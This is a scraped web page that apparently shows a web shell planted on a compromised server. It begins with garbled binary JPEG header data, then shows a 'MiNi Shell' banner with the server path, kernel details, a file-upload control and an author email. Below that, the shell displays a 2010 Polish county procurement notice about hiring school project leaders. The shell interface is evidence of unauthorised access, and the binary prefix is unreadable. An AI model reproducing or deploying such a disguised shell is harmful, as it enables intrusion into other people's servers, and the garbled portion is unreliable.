JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101129/387194-N-2010.html

<p class="kh_header"><b>Nowy Targ: Wyłonienie szkolnych liderów w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce dofinansowanego z Europejskiego Funduszu Społecznego - projekt systemowy Programu Operacyjnego Kapitał Ludzki na lata 2007-2013, Działanie 9.2</b><br>
<b>Numer ogłoszenia: 387194 - 2010; data zamieszczenia: 29.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Nowotarskiego , Aleja Tysiąclecia 35, 34-400 Nowy Targ, woj. małopolskie, tel. 018 2667034, faks 018 2667046.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nowotarski.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyłonienie szkolnych liderów w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce dofinansowanego z Europejskiego Funduszu Społecznego - projekt systemowy Programu Operacyjnego Kapitał Ludzki na lata 2007-2013, Działanie 9.2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wyłonienie liderów szkolnych w szkołach ponad gimnazjalnych Powiatu Nowotarskiego prowadzących kształcenie zawodowe uczestniczących w realizacji wieloletniego projektu systemowego Modernizacja kształcenia zawodowego w Małopolsce dofinansowanego  z Europejskiego Funduszu Społecznego. 
Zamawiający podzielił przedmiot zamówienia na siedem następujących części/zadań  i dopuścił składanie ofert częściowych. Każda cześć zamówienia polega na zatrudnieniu jednego lidera.
Zadanie nr 1 Szkolny lider w Zespole Szkół Zawodowych i Placówek w Krościenku nad Dunajcem  - ul. Jagiellońska 4, 34-450 Krościenko n/Dunajcem
Zadanie nr 2 Szkolny lider w Zespole Szkół Ekonomicznych w Nowym Targu, ul. Kowaniec 125, 34-400 Nowy Targ
Zadanie nr 3 Szkolny lider w Zespole Szkół Nr 1 w Nowym Targu, Pl. Słowackiego 13, 34-400 Nowy Targ
Zadanie nr 4 Szkolny lider w Specjalnym  Ośrodku  Szkolno-Wychowawczym Nr 1 w Nowym Targu, ul. Jana Pawła II 85, 34-400 Nowy Targ
Zadanie nr 5 Szkolny lider w Zespole Szkół im. Bohaterów Westerplatte w Jabłonce,  ul. Podhalańska 3, 34-480 Jabłonka
Zadanie nr 6 Szkolny lider w Zespole  Szkół w Rabce-Zdroju,  ul. Kościuszki 9, 34-700 Rabka-Zdrój
Zadanie nr 7 Szkolny lider w Zespole Szkół Technicznych i Placówek w Nowym Targu,  ul. Wojska Polskiego 9

Zadanie lidera / dotyczy wszystkich zadań 1-7/:

1)	Wspieranie procesu wdrażania programu/programów rozwojowych Szkoły poprzez organizację działań projektowych.
2)	Współpraca z przedsiębiorcami w zakresie planowania i organizacji form wsparcia w ramach Projektu.
3)	Organizowanie procesu rekrutacji w Szkole, w tym opracowanie Regulaminu Rekrutacji do Projektu w uzgodnieniu z Biurem Projektu, udział w pracach Komisji Rekrutacyjnej, przygotowanie notatek/protokołów/innych dokumentów z przeprowadzonej rekrutacji, zebranie dokumentów potwierdzających kwalifikowalność uczestników projektu.
4)	Monitorowanie liczby uczestników Projektu.
5)	Przygotowanie przedmiotów zamówienia oraz oszacowanie wartości dla zamówień publicznych zaplanowanych w Projekcie w celu realizacji programu/programów rozwojowych Szkoły. Przedmioty zamówienia mają być opisane w sposób zgodny z art. 29 i 30 Ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 r. (Dz. U. nr 113 poz. 759) oraz wytycznymi przekazanymi przez Biuro Projektu.
6)	Określenie warunków, jakie spełniać muszą wykonawcy poszczególnych form wsparcia.
7)	Opracowanie harmonogramów realizacji poszczególnych form wsparcia.
8)	Organizacja opieki dla uczniów korzystających z form wsparcia.
9)	Monitoring wykorzystania sprzętu, wyposażenia i innych towarów zakupionych w ramach Projektu zgodnie z zasadami obowiązującymi w POKL.
10)	Nadzór merytoryczny nad  realizacją form wsparcia Projektu (nadzorowanie jakości praktyk realizowanych u przedsiębiorców oraz innych form wsparcia, a także materiałów nabywanych w ramach Projektu).
11)	Monitorowanie i ewaluacja działań Szkoły w zakresie realizacji Projektu.
12)	Opracowywanie raportów z działań realizowanych w ramach Projektu, w tym w szczególności:
a)	zbieranie informacji i danych kontaktowych przedsiębiorstw współpracujących ze szkołą oraz podsumowywanie tej współpracy.
b)	raportowanie korzystania uczniów z dostępnych form wsparcia, w tym także, w miarę możliwości, sporządzanie materiałów zdjęciowych lub filmowych z realizacji zajęć.
c)	gromadzenie materiałów potwierdzających przeprowadzenie zajęć i innych form wsparcia - listy obecności, dzienniki zajęć itp.
13)	Upowszechnianie wśród uczniów informacji o naborach na zajęcia, kursy i szkolenia oraz o wszelkich wydarzeniach organizowanych w ramach Projektu; angażowanie samorządów uczniowskich w promowanie Projektu
14)	Opracowanie listy mailowej i telefonicznej przedstawicieli samorządów szkolnych i jej bieżąca aktualizacja.
15)	Uczestnictwo w wywiadówkach szkolnych w celu informowania rodziców 
o możliwości udziału młodzieży w projekcie.
16)	Tworzenie bazy loginów użytkowników Interaktywnego Programu Edukacyjnego.
17)	Współudział w organizacji konkursów dla uczniów oraz obsługa stoisk informacyjnych w trakcie wydarzeń edukacyjnych i kulturalno-rozrywkowych, podczas których promowany będzie Projekt.
18)	Wprowadzanie informacji dotyczących Projektu na ogólnoregionalny portal szkolnictwa zawodowego.
19)	Zapewnienie dokumentacji, w tym fotograficznej, imprez szkolnych, podczas których promowany będzie Projekt np. akademii szkolnych czy targów edukacyjnych (przygotowanie tekstów i zdjęć na stronę internetową Szkoły, organu prowadzącego szkołę i stronę Projektu).
20)	Odbiór materiałów promocyjnych z Biura Projektu oraz ich dystrybucja na terenie szkoły (wywieszanie plakatów, organizacja kolportażu ulotek).
21)	 Zapewnienie zgodnego z wytycznymi POKL oznaczenia pomieszczeń, sprzętów, wyposażenia i wszelkich materiałów zakupionych, opracowanych, powstających w ramach Projektu.
22)	Zgłaszanie propozycji zmian w Projekcie.
23)	Stała współpraca z zespołem ds. promocji i informacji Lidera Partnerstwa.
24)	Stała współpraca z Biurem Projektu, w szczególności przekazywanie wszystkich dokumentów  i informacji dotyczących Projektu w terminach umożliwiających jego realizację zgodnie z założonym harmonogramem i budżetem, a także umożliwiających spełnienie obowiązków sprawozdawczych i rozliczeniowych wynikających z Umowy Partnerskiej na rzecz realizacji Projektu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.41.00.00-1, 80.21.00.00-9, 79.42.00.00-4, 79.42.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane - nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się osoby posiadające następujące kwalifikacje i umiejętności ( Zadanie 1-7): 
1.	Wykształcenie wyższe pedagogiczne.
2.	Co najmniej 6-letni staż pracy w szkole.
3.	Doświadczenie na stanowisku kierowniczym w placówce oświatowej - co najmniej 1rok.
4.	Bardzo dobra znajomość problematyki kształcenia zawodowego poparta doświadczeniem z tytułu pełnionej/pełnionych funkcji.
5.	Doświadczenie we współpracy z przedsiębiorcami przy organizowaniu staży/praktyk zawodowych dla uczniów.
6.	Uprawnienia do sprawowania nadzoru pedagogicznego.
7.	Ukończone szkolenie lub studia z zakresu zarządzania oświatą.
8.	Umiejętność obsługi programów pakietu Microsoft Office i urządzeń biurowych.
9.	Znajomość ustawy Prawo zamówień publicznych oraz ustawy o ochronie danych osobowych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 pkt 1-4 ustawy Pzp 
-Wypełniony i podpisany formularz oferty
-Kwestionariusz osobowy
-Oświadczenie o  spełnianiu wszystkich warunków udziału w postępowaniu określonych w specyfikacji przez zamawiającego  
-Oświadczenie o niekaralności</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Warunki umowne określa formularz umowy, stanowiący załącznik nr 2 do SIWZ.
2.	Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 
2.1	 Jeżeli zmieni się okres realizacji Projektu to nastąpi zmiana okresu obowiązywania umowy i wynagrodzenie będzie wypłacone wyłącznie za zadania zrealizowane w okresie realizacji Projektu, w którym koszty  Projektu mogą być uznane za kwalifikowalne, zgodnie ze zaktualizowanym budżetem Projektu.
2.2	Jeżeli zmianie ulegną wytyczne/dokumenty odnoszące się do realizacji projektów w ramach POKL lub Lider Partnerstwa przekaże nowe wytyczne regulujące pracę szkolnych liderów.
2.3	Zamawiający uzna, że dokumenty i informacje przekazywane przez szkolnych liderów do Biura Projektu są przekazywane w czasie nie wystarczającym do spełnienia wszystkich obowiązków sprawozdawczych i rozliczeniowych może wprowadzić ściśle określone terminy przekazywania tych dokumentów przez szkolnych liderów.
2.4	Kwota wynagrodzenia brutto określona w umowie może ulec zmianie w przypadku zmiany sytuacji Wykonawcy, dotyczącej ubezpieczeń społecznych i Funduszu Pracy, powodującej zmiany stawek, powstanie lub ustanie obowiązku odprowadzania przez Zamawiającego składek na ubezpieczenia społeczne i Fundusz Pracy od wynagrodzenia Wykonawcy. W przypadku powstania po stronie Zamawiającego obowiązku odprowadzania składek na ubezpieczenia społeczne i Fundusz Pracy wynagrodzenie Wykonawcy zostanie zmniejszone o sumę składek na ubezpieczenia społeczne i Fundusz Pracy odprowadzonych przez Zamawiającego od wynagrodzenia Wykonawcy. W przypadku ustania obowiązku odprowadzania składek na ubezpieczenia społeczne i Fundusz Pracy przez Zamawiającego wynagrodzenie Wykonawcy zostanie powiększone o sumę tych składek.
2.5	Inne zmiany nieprzewidziane przez Zamawiającego i Wykonawcę mogące mieć wpływ na prawidłową realizację Projektu. 
3.	Wszelkie zmiany postanowień niniejszej umowy mogą nastąpić pisemnie, za zgodą obu stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nowotarski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Nowym Targu, Al. Tysiąclecia 35, 34-400 Nowy Targ.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.12.2010 godzina 10:00, miejsce: Oferty należy składać w siedzibie Zamawiającego w Nowym Targu przy Al. Tysiąclecia 35 w pokoju nr 103-sekretariat (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot postępowania jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - projekt systemowy Programu Operacyjnego Kapitał Ludzki na lata 2007-2013, Działanie 9.2, Modernizacja kształcenia zawodowego w Małopolsce..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com